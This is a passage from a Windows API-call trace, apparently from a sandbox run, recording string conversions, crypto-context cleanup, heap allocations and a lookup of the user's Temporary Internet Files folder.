lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72708*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0202.865] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.865] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.865] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0202.865] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0202.865] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0202.865] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0202.865] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0202.866] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0202.866] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0202.866] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0202.866] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0202.866] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0202.866] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0202.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0202.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaa68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0202.866] CryptDestroyKey (hKey=0x9e1bf8) returned 1 [0202.866] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0202.866] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0202.866] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0202.866] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0202.866] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0202.866] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0202.866] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0202.866] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0202.866] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0202.866] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0202.866] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0202.866] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0202.866] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0202.867] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0202.867] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0202.868] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0202.868] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0202.868] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0202.868] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0202.868] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0202.868] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0202.868] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0202.868] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0202.868] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.868] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0202.868] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.868] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0202.868] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.868] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.868] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0202.868] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.868] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0202.868] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.868] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.869] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.869] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.869] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0202.869] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0202.869] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0202.869] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0202.869] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0202.869] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.869] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0202.869] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0202.869] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0202.869] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0202.869] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0202.869] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0202.869] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0202.869] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0202.869] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0202.869] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0202.869] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0202.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0202.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0202.869] CryptReleaseContext (hProv=0xa7c5d8, dwFlags=0x0) returned 1 [0202.870] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.870] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0202.870] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0202.870] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0202.870] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0202.870] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0202.870] FreeLibrary (hLibModule=0x76390000) returned 1 [0202.870] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.870] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.870] CloseHandle (hObject=0x524) returned 1 [0202.871] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.871] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0202.871] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0202.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0202.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0202.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0202.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0202.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0202.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0202.871] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0202.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0202.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0202.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0202.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0202.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0202.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0202.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0202.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0202.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0202.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0202.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6e) returned 0x2a73980 [0202.873] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Temporary Internet Files", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x8cedf4*="Temporary Internet Files") returned 0x36 [0202.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73980 | out: hHeap=0x2af0000) returned 1 [0202.873] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temporary Internet Files" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temporary internet files")) returned 0x2416 [0202.873] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temporary Internet Files\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0xf, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x120a58, ftLastAccessTime.dwLowDateTime=0x47558b, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x7626d180, nFileSizeLow=0x4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="", cAlternateFileName="")) returned 0xffffffff [0202.873] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0202.873] GetLastError () returned 0x6 [0202.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0202.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0202.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0202.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0202.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0202.873] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0202.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0202.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0202.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0202.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0202.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0202.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0202.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0202.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0202.874] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0202.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0202.874] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0202.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0202.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0202.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0202.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0202.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0202.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0202.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0202.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0202.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0202.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0202.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0202.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0202.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0202.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0202.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0202.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0202.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0202.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0202.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0202.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0202.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0202.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0202.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6e) returned 0x2a74808 [0202.875] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Temporary Internet Files", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temporary 